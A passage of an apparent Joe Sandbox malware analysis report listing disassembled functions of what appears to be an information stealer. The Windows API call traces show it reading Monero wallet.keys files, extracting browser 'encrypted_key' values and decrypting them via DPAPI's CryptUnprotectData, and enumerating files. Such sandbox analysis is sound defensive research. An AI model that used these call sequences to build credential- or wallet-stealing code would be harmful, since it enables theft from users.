                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: bcaf489451ff197d9feca5f3c0bbd92d243d68170f84b6f643fd22fcd87a7fba
                                  • Instruction ID: 9d2190b4850c71e611491fc5bb7ecb1b3638f4303ff741331aa31283ea67d572
                                  • Opcode Fuzzy Hash: bcaf489451ff197d9feca5f3c0bbd92d243d68170f84b6f643fd22fcd87a7fba
                                  • Instruction Fuzzy Hash: 1E8136719101089BDB08FBA4DC52DEE7738AF94300F51812AF11BA7091EF386A59EB63
                                  Function 00F6F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F81580,00F80D92), ref: 00F6F54C
                                  • lstrlen.KERNEL32(00000000), ref: 00F6F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 02d05da10ce5fb4f23b841aa74421a019483dd7586f6c43e43eca0499f6bf55d
                                  • Instruction ID: d18ea99d88ec5dc0a9ec0b4e21566dfd3171ac55d5c9b7a811a267013d5f06fc
                                  • Opcode Fuzzy Hash: 02d05da10ce5fb4f23b841aa74421a019483dd7586f6c43e43eca0499f6bf55d
                                  • Instruction Fuzzy Hash: 4D511371D101089ADB08FBB4DC56DEE7378AF94300F41C529F51A67191EF386A1AEBA3
                                  Function 00F73560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 50a750e266babbe10d123cdfb985ce6a9adb0573ece1a70f7d77a4d2f8982357
                                  • Instruction ID: 89b362d535588dcc13f678b215e636480b6936faba8648b26f41acf09c1c64b7
                                  • Opcode Fuzzy Hash: 50a750e266babbe10d123cdfb985ce6a9adb0573ece1a70f7d77a4d2f8982357
                                  • Instruction Fuzzy Hash: DD414EB1D10109ABDB04EFA4DC45EEEB774EF44304F40C029E51A67280EB35AA49EFA3
                                  Function 00F69CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D39
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                    • Part of subcall function 00F69AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                    • Part of subcall function 00F69AC0: LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                    • Part of subcall function 00F69B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B84
                                    • Part of subcall function 00F69B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69BA3
                                    • Part of subcall function 00F69B60: LocalFree.KERNEL32(?), ref: 00F69BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7a161499419aa72e007049c5e96f070cfdb8a0ccc2ee43581dd599e8f14cafbb
                                  • Instruction ID: bb2c5be40e94f95625bc167c67958081e91ca567a11c151f5d585700730d6e93
                                  • Opcode Fuzzy Hash: 7a161499419aa72e007049c5e96f070cfdb8a0ccc2ee43581dd599e8f14cafbb
                                  • Instruction Fuzzy Hash: D6313CB6D10209ABCB04EFE4DC85AEFB7BCFF48304F144529E905A7241EB749A05DBA1
                                  Function 00F792E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00F73AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00F73AEE,?), ref: 00F792FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00F73AEE), ref: 00F79319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00F79327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: d62461f9aa81d89e2564a69a4aa15e7487c02069f2614616a3fd0a895884918b
                                  • Instruction ID: 7f1195417a1425deca72507d68194c4a44ba59af6cb054bb5d5249dc44988d49
                                  • Opcode Fuzzy Hash: d62461f9aa81d89e2564a69a4aa15e7487c02069f2614616a3fd0a895884918b
                                  • Instruction Fuzzy Hash: D1F08C35E44208BBDB24DBF0EC08BAE7BB9AB48320F50C264F625A72C4D6B59640DB40
                                  Function 00F7C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00F7C74E
                                    • Part of subcall function 00F7BF9F: __amsg_exit.LIBCMT ref: 00F7BFAF
                                  • __getptd.LIBCMT ref: 00F7C765
                                  • __amsg_exit.LIBCMT ref: 00F7C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00F7C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: d2a54402fbbc1679496adeba852e6a7309e71d5515c0b317ee0409b8b423da5c
                                  • Instruction ID: 0437d7b9d42e257f51489f746922affc22084b0890b1ade3bba9cb90203a07cf
                                  • Opcode Fuzzy Hash: d2a54402fbbc1679496adeba852e6a7309e71d5515c0b317ee0409b8b423da5c
                                  • Instruction Fuzzy Hash: 7DF06D329046049BD724BBB85C46B9D37A06F01B20F25C14FF41CA61D2DF6C5942BF97
                                  Function 00F74F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74F7A
                                  • lstrcat.KERNEL32(?,00F81070), ref: 00F74F97
                                  • lstrcat.KERNEL32(?,016F8A80), ref: 00F74FAB
                                  • lstrcat.KERNEL32(?,00F81074), ref: 00F74FBD
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F7492C
                                    • Part of subcall function 00F74910: FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                    • Part of subcall function 00F74910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                    • Part of subcall function 00F74910: FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 29fc6a45db36c7bf7f1bdb62437571f6cac04030820559505f0bb5cd8cd38f2d
                                  • Instruction ID: d57a92fd7432822e2cfb63fefb36b970a8d8d2be9bd3f97cd4d8a5bbbbc4afe6
                                  • Opcode Fuzzy Hash: 29fc6a45db36c7bf7f1bdb62437571f6cac04030820559505f0bb5cd8cd38f2d
                                  • Instruction Fuzzy Hash: B021FB76900204A7C7A8FB70EC46EED373CAF54300F404555B65A93085EF789AC9DB92